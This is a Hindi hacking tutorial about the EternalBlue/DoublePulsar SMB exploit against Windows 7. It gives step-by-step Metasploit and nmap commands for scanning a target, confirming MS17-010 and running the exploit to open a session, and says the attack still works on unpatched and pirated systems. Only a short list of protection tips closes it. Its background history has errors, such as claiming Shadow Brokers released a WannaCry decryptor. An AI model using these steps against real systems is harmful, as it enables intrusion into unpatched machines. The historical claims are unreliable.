EXPLOITS WINDOWS USING ETERNALBLUE EXPLOIT
SMB EXPLOIT AND HACK WINDOWS
नमस्कार दोस्तों,
किसी अटैक और Exploit का उपयोग करने से पहले हमें यह समझना होता है कि वह कैसे काम करता है।
जब तक हम यह नहीं समझेेगे, तब तक हम एक अच्छे हैकर नहीं बन पायेगे।
शरूआत में इनमें कई ऐरर आते है, कई समस्याएं आती है।
एक अच्छा हैकर्स बनने के लिए हर समस्या का समाधान करते है हुए आगे बढ़ते रहना है।
अगर समस्या आने पर उस चीज को छोड़ देगे तो आप कभी भी हैकर नहीं बन पायेगे।
Shadow Brokers ग्रुप एक anonymous हैकर्स का ग्रुप है। जिसने 2017 में NSA (Narional Security Agency) Eternalblue टूल को Leak किया।
मई 2017 एक कोरियन हैकर्स ने इस Eternalblue टूल्स का उपयोग कर WannaCry नाम का रेन्समवेयर बनाया।
सिर्फ 4 दिनों में इसने लाखों यूजर्स को अपनी चपेट में लिया।
इस रेन्समवेयर ने Windows की वेनेरेबिल्टिज का उपयोग किया और विण्डोज को हैक किया। माइक्रोसाफ्ट ने भी इस वेनेरेबिल्टीज को पैच कर दिया।
लेकिन रेन्समवेयर का इंक्रिप्ट की गई फाइल्स को रिकोवर करना फिर भी मुश्किल काम है।
Shadow Brokers ग्रुप ने इसका डिक्रिप्टर जारी किया, जिससे काफी लोगों का डाटा रिकवर किया जा सका।
WannaCry टीम ने SMB port Service का उपयोग कर Exploit तैयार किया और विण्डोज को हैक किया।
माईक्रोसोफ्ट ने SMB Version को अपडेट कर इसे पैच कर दिया। 2018 में FBI द्वारा कोरियन हैकर्स को पकड़ लिया गया।
ऐसा नहीं है ये Eternalblue टूल्स आज कार्य नहीं करता है। ये टूल आज भी कार्य करता है। बस हमें समझने की जरूरत है।
क्या है SMB?
नेटर्वकिंग में एक सिस्टम से दूसरे सिस्टम में फाईल्स, प्रिंटर आदि को शेयर करने के लिए SMB (Server Message Block) सर्विस का उपयोग किया जाता है।
जिससे की उस सिस्टम की फाईल्स को हम दूसरे सिस्टम में भी एक्सेस कर सकते है।
इस Exploit में पोर्ट 139 व 445 का उपयोग किया जाता है, अगर किसी सिस्टम में ये दोनों पोर्ट ओपन है तो आसानी से Hack किया जा सकता है।
ज्यादातर लोग पाइरेटेड विण्डोज का उपयोग करते है। जिससे वह प्रोपर अपडेट नहीं होता है।
माईक्रोसोफ्ट ने 2014 के बाद विण्डोज XP के अपडेट देना बन्द कर दिया है। इसक कारण विण्डोज XP और विण्डोज 7 को आज भी इस एक्सप्लोइट के द्वारा हैक किया जा सकता है।
अगर हम SMB इनाबल कर, पोर्ट 139 व 445 को फोरर्वड करते है तो उस सिस्टम को कहीं से भी सिर्फ आईपी के द्वारा एक्सेस किया जा सकता है।
How to Exploits Windows 7 Using Eternalblue Exploit
Pre-Require
Mind
Wine32
Metasploit-Fremworks
नीचे दिये गये कमाण्ड का उपयोग कर वाईन को इंस्टाल कर ले। आपका सिस्टम अपटूडेट होना चाहिए। नहीं को कोई ना कोई ऐरर आ जायेगा।
sudo apt install wine32
नीचे दिये गये लिंक से एक्सप्लोइट को डाउनलोड कर, फोल्डर को एक्सटे्रक्ट कर ले।
eternalblue_doublepulsar.rb फाईल को कोपी करे के root के अन्दर नीचे दिये गये लोकेशन पर पेस्ट कर दे।
/root/.msf4/modules/exploits/windows/smb/
फोल्डर नहीं हो तो आप फोल्डर बना ले।
पोर्ट स्कैन करने के लिए NMAP का उपयोग कर हुए पोर्ट 445 ओपन है या नहीं ये पता करें, NMAP कमाण्ड को Metasploit में भी रन किया जा सकता है।
NMAP का उपयोग कैसे करें? इस पर मैं पहले ही पोस्ट बना चुका है आप देख सकते है।
nmap -v -Pn <target ip address>
“msfconsole“ कमाण्ड का उपयोग कर मेटासप्लाईट को ओपन करें।
search eternalblue
कमाण्ड से eternalblue से सम्बन्धित सारे एक्सप्लोइट आपके सामने आ जायेगे।
SMB Scanner का उपयोग करके चैक कर ले कि सिस्टम vulnerable है या नहीं? इसके लिए नीचे दिय गये कमाण्ड का उपयोग करें।
use auxiliary/scanner/smb/smb_ms17_010
Show Options का उपयोग करके आप इस के सारे ओप्शन चैक कर सकते है। इस ओपन में हमें सिर्फ RHOST को ही सेट करना है।
set RHOST <Target IP Address>
Rhost सेट करने के बाद, “run“ कमाण्ड से Exploit को Run करें।
अगर सिस्टम वेनरेबल है तभी आप आगे बढ़ पायेगे।
एक्सप्लोईट को यूज करने के लिए use कमाण्ड का उपयोग करें।
use exploit/windows/smb/eternalblue_doublepulsar
Show Options का उपयोग करके आप इस के सारे ओप्शन चैक कर सकते है। नीचे दिये गये सारे कमाण्ड को आपको सेट करना पड़ेगा।
set DOUBLEPULSARPATH <deps Folder Path>
set ETERNALBLUEPATH <deps Folder Path>
Deps फोल्डर आपको एक्सप्लोईट के फोल्डर में मिल जायेगा। आपको इस फोल्डर का पाथ कोपी करके, पेस्ट करना है।
set WINEPATH /home/username/.wine/drive_c/
set RHOST <Target IP Address>
lhost और lport Auto सेट रहता है। आप बदलना चाहते है तो बदल सकते है।
run
“help” कमाण्ड का उपयोग करके आप मेटासप्लोईट के सारे कमाण्ड देख सकते है और उनका उपयोग कर सकते है।
अगर सब कुछ सही रहा तो Sessions बन जायेगी।आप बार बार कोशिश करें और पता करें की गलती कहा हुई है। अगर आप सही से कोशिश करेगें तो एक्सप्लोईट 100 प्रतिशत कार्य करेंगा।
कैसे सुरक्षित रहे?
1. अनवाण्टेड पोर्ट फोरवर्डिंग नहीं करें।
2. फायरवाल का प्रयोग करें।
3. एन्टीवायरस व विण्डोज को हमेंशा अपटूडेट देख।
4. इन्टरनेट से डाउनलोड एप्स को अपने मैन सिस्टम पर नहीं चालाये।